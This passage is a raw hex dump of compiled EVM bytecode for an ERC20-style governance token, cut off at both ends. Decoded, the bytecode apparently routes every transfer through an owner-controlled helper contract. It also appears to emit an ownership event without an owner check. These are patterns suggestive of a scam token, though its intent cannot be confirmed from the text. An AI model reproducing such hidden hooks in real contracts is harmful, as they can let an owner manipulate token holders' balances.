ffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054620003ee60201b90919060201c565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003e2919062000854565b60405180910390a35050565b6000808284620003ff9190620008a0565b90508381101562000447576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200043e906200092b565b60405180910390fd5b8091505092915050565b6102138062003ab183390190565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004e157607f821691505b602082108103620004f757620004f662000499565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005617fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000522565b6200056d868362000522565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005ba620005b4620005ae8462000585565b6200058f565b62000585565b9050919050565b6000819050919050565b620005d68362000599565b620005ee620005e582620005c1565b8484546200052f565b825550505050565b600090565b62000605620005f6565b62000612818484620005cb565b505050565b5b818110156200063a576200062e600082620005fb565b60018101905062000618565b5050565b601f82111562000689576200065381620004fd565b6200065e8462000512565b810160208510156200066e578190505b620006866200067d8562000512565b83018262000617565b50505b505050565b600082821c905092915050565b6000620006ae600019846008026200068e565b1980831691505092915050565b6000620006c983836200069b565b9150826002028217905092915050565b620006e4826200045f565b67ffffffffffffffff8111156200070057620006ff6200046a565b5b6200070c8254620004c8565b620007198282856200063e565b600060209050601f8311600181146200075157600084156200073c578287015190505b620007488582620006bb565b865550620007b8565b601f1984166200076186620004fd565b60005b828110156200078b5784890151825560018201915060208501945060208101905062000764565b86831015620007ab5784890151620007a7601f8916826200069b565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000809601f83620007c0565b91506200081682620007d1565b602082019050919050565b600060208201905081810360008301526200083c81620007fa565b9050919050565b6200084e8162000585565b82525050565b60006020820190506200086b600083018462000843565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620008ad8262000585565b9150620008ba8362000585565b9250828201905080821115620008d557620008d462000871565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000913601b83620007c0565b91506200092082620008db565b602082019050919050565b60006020820190508181036000830152620009468162000904565b9050919050565b613154806200095d6000396000f3fe608060405234801561001057600080fd5b50600436106101735760003560e01c8063787ca65f116100de578063a457c2d711610097578063dd62ed3e11610071578063dd62ed3e14610476578063e7a324dc146104a6578063f1127ed8146104c4578063f2fde38b146104f557610173565b8063a457c2d7146103fa578063a9059cbb1461042a578063b792d03f1461045a57610173565b8063787ca65f146103385780637c519ffb146103545780637ecebe001461035e5780638da5cb5b1461038e57806395d89b41146103ac5780639ab24eb0146103ca57610173565b8063395093511161013057806339509351146102505780634ada218b146102805780636fcfff451461029e57806370a08231146102ce578063715018a6146102fe578063782d6fe11461030857610173565b806306fdde0314610178578063095ea7b31461019657806318160ddd146101c657806320606b70146101e457806323b872dd14610202578063313ce56714610232575b600080fd5b610180610511565b60405161018d919061231b565b60405180910390f35b6101b060048036038101906101ab91906123d6565b6105a3565b6040516101bd9190612431565b60405180910390f35b6101ce6105c1565b6040516101db919061245b565b60405180910390f35b6101ec6105cb565b6040516101f9919061248f565b60405180910390f35b61021c600480360381019061021791906124aa565b6105ef565b6040516102299190612431565b60405180910390f35b61023a6106c8565b6040516102479190612519565b60405180910390f35b61026a600480360381019061026591906123d6565b6106df565b6040516102779190612431565b60405180910390f35b610288610792565b6040516102959190612431565b60405180910390f35b6102b860048036038101906102b39190612534565b6107a5565b6040516102c59190612580565b60405180910390f35b6102e860048036038101906102e39190612534565b6107c8565b6040516102f5919061245b565b60405180910390f35b610306610811565b005b610322600480360381019061031d91906123d6565b61094b565b60405161032f919061245b565b60405180910390f35b610352600480360381019061034d919061259b565b610d20565b005b61035c610ed0565b005b61037860048036038101906103739190612534565b610f78565b604051610385919061245b565b60405180910390f35b610396610f90565b6040516103a39190612611565b60405180910390f35b6103b4610fb9565b6040516103c1919061231b565b60405180910390f35b6103e460048036038101906103df9190612534565b61104b565b6040516103f1919061245b565b60405180910390f35b610414600480360381019061040f91906123d6565b61112a565b6040516104219190612431565b60405180910390f35b610444600480360381019061043f91906123d6565b6111f7565b6040516104519190612431565b60405180910390f35b610474600480360381019061046f9190612534565b611215565b005b610490600480360381019061048b919061262c565b61128e565b60405161049d919061245b565b60405180910390f35b6104ae611315565b6040516104bb919061248f565b60405180910390f35b6104de60048036038101906104d99190612698565b611339565b6040516104ec9291906126d8565b60405180910390f35b61050f600480360381019061050a9190612534565b61137a565b005b60606005805461052090612730565b80601f016020809104026020016040519081016040528092919081815260200182805461054c90612730565b80156105995780601f1061056e57610100808354040283529160200191610599565b820191906000526020600020905b81548152906001019060200180831161057c57829003601f168201915b5050505050905090565b60006105b76105b0611522565b848461152a565b6001905092915050565b6000600454905090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b60006105fc8484846116f3565b6106bd84610608611522565b6106b8856040518060600160405280602881526020016130a460289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061066e611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b600190509392505050565b6000600760009054906101000a900460ff16905090565b60006107886106ec611522565b8461078385600260006106fd611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b61152a565b6001905092915050565b600360009054906101000a900460ff1681565b600a6020528060005260406000206000915054906101000a900463ffffffff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610819611522565b73ffffffffffffffffffffffffffffffffffffffff16610837610f90565b73ffffffffffffffffffffffffffffffffffffffff161461088d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610884906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600043821061098f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109869061283f565b60405180910390fd5b6000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff16036109fb576000915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184610a4a919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff1611610af757600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183610ad1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060010154915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008063ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff161115610b78576000915050610d1a565b600080600183610b88919061288e565b90505b8163ffffffff168163ffffffff161115610cb457600060028383610baf919061288e565b610bb991906128f5565b82610bc4919061288e565b90506000600960008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206040518060400160405290816000820160009054906101000a900463ffffffff1663ffffffff1663ffffffff168152602001600182015481525050905086816000015163ffffffff1603610c8357806020015195505050505050610d1a565b86816000015163ffffffff161015610c9d57819350610cad565b600182610caa919061288e565b92505b5050610b8b565b600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206001015493505050505b92915050565b610d28611522565b73ffffffffffffffffffffffffffffffffffffffff16610d46610f90565b73ffffffffffffffffffffffffffffffffffffffff1614610d9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d93906127ad565b60405180910390fd5b60011515600360009054906101000a900460ff16151503610eca576000821115610dce57610dc981611888565b610e38565b604051610dda9061227e565b604051809103906000f080158015610df6573d6000803e3d6000fd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28585856040518463ffffffff1660e01b8152600401610e9793929190612926565b600060405180830381600087803b158015610eb157600080fd5b505af1158015610ec5573d6000803e3d6000fd5b505050505b50505050565b610ed8611522565b73ffffffffffffffffffffffffffffffffffffffff16610ef6610f90565b73ffffffffffffffffffffffffffffffffffffffff1614610f4c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f43906127ad565b60405180910390fd5b600360009054906101000a900460ff1615600360006101000a81548160ff021916908315150217905550565b600b6020528060005260406000206000915090505481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610fc890612730565b80601f0160208091040260200160405190810160405280929190818152602001828054610ff490612730565b80156110415780601f1061101657610100808354040283529160200191611041565b820191906000526020600020905b81548152906001019060200180831161102457829003601f168201915b5050505050905090565b600080600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff16116110b5576000611122565b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183611103919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b915050919050565b60006111ed611137611522565b846111e8856040518060600160405280602581526020016130fa6025913960026000611161611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b6001905092915050565b600061120b611204611522565b84846116f3565b6001905092915050565b8073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36001600060146101000a81548160ff02191690831515021790555050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b6009602052816000526040600020602052806000526040600020600091509150508060000160009054906101000a900463ffffffff16908060010154905082565b611382611522565b73ffffffffffffffffffffffffffffffffffffffff166113a0610f90565b73ffffffffffffffffffffffffffffffffffffffff16146113f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ed906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611465576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161145c906129cf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611599576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159090612a61565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ff90612af3565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116e6919061245b565b60405180910390a3505050565b6116fe8383836118da565b6117c7600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611b71565b505050565b6000838311158290611814576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180b919061231b565b60405180910390fd5b5082846118219190612b13565b90509392505050565b60008082846118399190612b47565b90508381101561187e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187590612bc7565b60405180910390fd5b8091505092915050565b611890611e20565b156118d75780600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194090612c59565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119af90612ceb565b60405180910390fd5b6119c3838383611e36565b611a2f8160405180606001604052806026815260200161307e60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611ac481600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b64919061245b565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bad5750600081115b15611e1b57600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611ce6576000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611c50576000611cbd565b600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611c9e919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611cd48483611ecc90919063ffffffff16565b9050611ce286848484611f25565b5050505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611e1a576000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611d84576000611df1565b600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611dd2919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611e08848361182a90919063ffffffff16565b9050611e1685848484611f25565b5050505b5b505050565b60008060149054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28484846040518463ffffffff1660e01b8152600401611e9593929190612926565b600060405180830381600087803b158015611eaf57600080fd5b505af1158015611ec3573d6000803e3d6000fd5b50505050505050565b600082821115611f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f0890612d57565b60405180910390fd5b8183611f1d9190612b13565b905092915050565b6000611f49436040518060600160405280602e81526020016130cc602e9139612228565b905060008463ffffffff16118015611fe757508063ffffffff16600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600187611fb1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff16145b156120615781600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600060018761203b919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101819055506121d1565b60405180604001604052808263ffffffff16815260200183815250600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008663ffffffff1663ffffffff16815260200190815260200160002060008201518160000160006101000a81548163ffffffff021916908363ffffffff160217905550602082015181600101559050508363ffffffff166001856121209190612d77565b63ffffffff1611612166576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161215d90612e21565b60405180910390fd5b6001846121739190612d77565b600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548163ffffffff021916908363ffffffff1602179055505b8473ffffffffffffffffffffffffffffffffffffffff167fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a7248484604051612219929190612e41565b60405180910390a25050505050565b600064010000000083108290612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b919061231b565b60405180910390fd5b5082905092915050565b61021380612e6b83390190565b600081519050919050565b600082825260208201905092915050565b60005b838110156122c55780820151818401526020810190506122aa565b60008484015250505050565b6000601f19601f8301169050919050565b60006122ed8261228b565b6122f78185612296565b93506123078185602086016122a7565b612310816122d1565b840191505092915050565b6000602082019050818103600083015261233581846122e2565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061236d82612342565b9050919050565b61237d81612362565b811461238857600080fd5b50565b60008135905061239a81612374565b92915050565b6000819050919050565b6123b3816123a0565b81146123be57600080fd5b50565b6000813590506123d0816123aa565b92915050565b600080604083850312156123ed576123ec61233d565b5b60006123fb8582860161238b565b925050602061240c858286016123c1565b9150509250929050565b60008115159050919050565b61242b81612416565b82525050565b60006020820190506124466000830184612422565b92915050565b612455816123a0565b82525050565b6000602082019050612470600083018461244c565b92915050565b6000819050919050565b61248981612476565b82525050565b60006020820190506124a46000830184612480565b92915050565b6000806000606084860312156124c3576124c261233d565b5b60006124d18682870161238b565b93505060206124e28682870161238b565b92505060406124f3868287016123c1565b9150509250925092565b600060ff82169050919050565b612513816124fd565b82525050565b600060208201905061252e600083018461250a565b92915050565b60006020828403121561254a5761254961233d565b5b60006125588482850161238b565b91505092915050565b600063ffffffff82169050919050565b61257a81612561565b82525050565b60006020820190506125956000830184612571565b92915050565b600080600080608085870312156125b5576125b461233d565b5b60006125c38782880161238b565b94505060206125d48782880161238b565b93505060406125e5878288016123c1565b92505060606125f68782880161238b565b91505092959194509250565b61260b81612362565b82525050565b60006020820190506126266000830184612602565b92915050565b600080604083850312156126435761264261233d565b5b60006126518582860161238b565b92505060206126628582860161238b565b9150509250929050565b61267581612561565b811461268057600080fd5b50565b6000813590506126928161266c565b92915050565b600080604083850312156126af576126ae61233d565b5b60006126bd8582860161238b565b92505060206126ce85828601612683565b9150509250929050565b60006040820190506126ed6000830185612571565b6126fa602083018461244c565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061274857607f821691505b60208210810361275b5761275a612701565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612797602083612296565b91506127a282612761565b602082019050919050565b600060208201905081810360008301526127c68161278a565b9050919050565b7f6765745072696f72566f7465733a206e6f74207965742064657465726d696e6560008201527f6400000000000000000000000000000000000000000000000000000000000000602082015250565b6000612829602183612296565b9150612834826127cd565b604082019050919050565b600060208201905081810360008301526128588161281c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061289982612561565b91506128a483612561565b9250828203905063ffffffff8111156128c0576128bf61285f565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061290082612561565b915061290b83612561565b92508261291b5761291a6128c6565b5b828204905092915050565b600060608201905061293b6000830186612602565b6129486020830185612602565b612955604083018461244c565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006129b9602683612296565b91506129c48261295d565b604082019050919050565b600060208201905081810360008301526129e8816129ac565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612a4b602483612296565b9150612a56826129ef565b604082019050919050565b60006020820190508181036000830152612a7a81612a3e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612add602283612296565b9150612ae882612a81565b604082019050919050565b60006020820190508181036000830152612b0c81612ad0565b9050919050565b6000612b1e826123a0565b9150612b29836123a0565b9250828203905081811115612b4157612b4061285f565b5b92915050565b6000612b52826123a0565b9150612b5d836123a0565b9250828201905080821115612b7557612b7461285f565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000612bb1601b83612296565b9150612bbc82612b7b565b602082019050919050565b60006020820190508181036000830152612be081612ba4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612c43602583612296565b9150612c4e82612be7565b604082019050919050565b60006020820190508181036000830152612c7281612c36565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612cd5602383612296565b9150612ce082612c79565b604082019050919050565b60006020820190508181036000830152612d0481612cc8565b9050919050565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f770000600082015250565b6000612d41601e83612296565b9150612d4c82612d0b565b602082019050919050565b60006020820190508181036000830152612d7081612d34565b9050919050565b6000612d8282612561565b9150612d8d83612561565b9250828201905063ffffffff811115612da957612da861285f565b5b92915050565b7f5f7772697465436865636b706f696e743a206e657720636865636b706f696e7460008201527f2065786365656473203332206269747300000000000000000000000000000000602082015250565b6000612e0b603083612296565b9150612e1682612daf565b604082019050919050565b60006020820190508181036000830152612e3a81612dfe565b9050919050565b6000604082019050612e56600083018561244c565b612e63602083018461244c565b939250505056fe608060405234801561001057600080fd5b506101f3806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c80636bf92ea214610030575b600080fd5b61004a6004803603810190610045919061016a565b61004c565b005b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610101826100d6565b9050919050565b610111816100f6565b811461011c57600080fd5b50565b60008135905061012e81610108565b92915050565b6000819050919050565b61014781610134565b811461015257600080fd5b50565b6000813590506101648161013e565b92915050565b600080600060608486031215610183576101826100d1565b5b60006101918682870161011f565b93505060206101a28682870161011f565b92505060406101b386828701610155565b915050925092509256fea26469706673582212207b0e117a2c60444165701ebddd3e3f73e03e65a5b4b4619ca32ed6d29cf1520564736f6c6343000813003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a130ca27e7bfcbe5329cb0c6089e685ce4ed20cabf6b2a81e5cdf57ed76ff88864736f6c63430008130033608060405234801561001057600080fd5b506101f3806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c80636bf92ea214610030575b600080fd5b61004a6004803603810190610045919061016a565b61004c565b005b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610101826100d6565b9050919050565b610111816100f6565b811461011c57600080fd5b50565b60008135905061012e81610108565b92915050565b6000819050919050565b61014781610134565b811461015257600080fd5b50565b6000813590506101648161013e565b92915050565b600080600060608486031215610183576101826100d1565b5b60006101918682870161011f565b93505060206101a28682870161011f565b92505060406101b386828701610155565b915050925092509256fea26469706673582212207b0e117a2c60444165701ebddd3e3f73e03e65a5b4b4619ca32ed6d29cf1520564736f6c63430008130033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101735760003560e01c8063787ca65f116100de578063a457c2d711610097578063dd62ed3e11610071578063dd62ed3e14610476578063e7a324dc146104a6578063f1127ed8146104c4578063f2fde38b146104f557610173565b8063a457c2d7146103fa578063a9059cbb1461042a578063b792d03f1461045a57610173565b8063787ca65f146103385780637c519ffb146103545780637ecebe001461035e5780638da5cb5b1461038e57806395d89b41146103ac5780639ab24eb0146103ca57610173565b8063395093511161013057806339509351146102505780634ada218b146102805780636fcfff451461029e57806370a08231146102ce578063715018a6146102fe578063782d6fe11461030857610173565b806306fdde0314610178578063095ea7b31461019657806318160ddd146101c657806320606b70146101e457806323b872dd14610202578063313ce56714610232575b600080fd5b610180610511565b60405161018d919061231b565b60405180910390f35b6101b060048036038101906101ab91906123d6565b6105a3565b6040516101bd9190612431565b60405180910390f35b6101ce6105c1565b6040516101db919061245b565b60405180910390f35b6101ec6105cb565b6040516101f9919061248f565b60405180910390f35b61021c600480360381019061021791906124aa565b6105ef565b6040516102299190612431565b60405180910390f35b61023a6106c8565b6040516102479190612519565b60405180910390f35b61026a600480360381019061026591906123d6565b6106df565b6040516102779190612431565b60405180910390f35b610288610792565b6040516102959190612431565b60405180910390f35b6102b860048036038101906102b39190612534565b6107a5565b6040516102c59190612580565b60405180910390f35b6102e860048036038101906102e39190612534565b6107c8565b6040516102f5919061245b565b60405180910390f35b610306610811565b005b610322600480360381019061031d91906123d6565b61094b565b60405161032f919061245b565b60405180910390f35b610352600480360381019061034d919061259b565b610d20565b005b61035c610ed0565b005b61037860048036038101906103739190612534565b610f78565b604051610385919061245b565b60405180910390f35b610396610f90565b6040516103a39190612611565b60405180910390f35b6103b4610fb9565b6040516103c1919061231b565b60405180910390f35b6103e460048036038101906103df9190612534565b61104b565b6040516103f1919061245b565b60405180910390f35b610414600480360381019061040f91906123d6565b61112a565b6040516104219190612431565b60405180910390f35b610444600480360381019061043f91906123d6565b6111f7565b6040516104519190612431565b60405180910390f35b610474600480360381019061046f9190612534565b611215565b005b610490600480360381019061048b919061262c565b61128e565b60405161049d919061245b565b60405180910390f35b6104ae611315565b6040516104bb919061248f565b60405180910390f35b6104de60048036038101906104d99190612698565b611339565b6040516104ec9291906126d8565b60405180910390f35b61050f600480360381019061050a9190612534565b61137a565b005b60606005805461052090612730565b80601f016020809104026020016040519081016040528092919081815260200182805461054c90612730565b80156105995780601f1061056e57610100808354040283529160200191610599565b820191906000526020600020905b81548152906001019060200180831161057c57829003601f168201915b5050505050905090565b60006105b76105b0611522565b848461152a565b6001905092915050565b6000600454905090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b60006105fc8484846116f3565b6106bd84610608611522565b6106b8856040518060600160405280602881526020016130a460289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061066e611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b600190509392505050565b6000600760009054906101000a900460ff16905090565b60006107886106ec611522565b8461078385600260006106fd611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b61152a565b6001905092915050565b600360009054906101000a900460ff1681565b600a6020528060005260406000206000915054906101000a900463ffffffff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610819611522565b73ffffffffffffffffffffffffffffffffffffffff16610837610f90565b73ff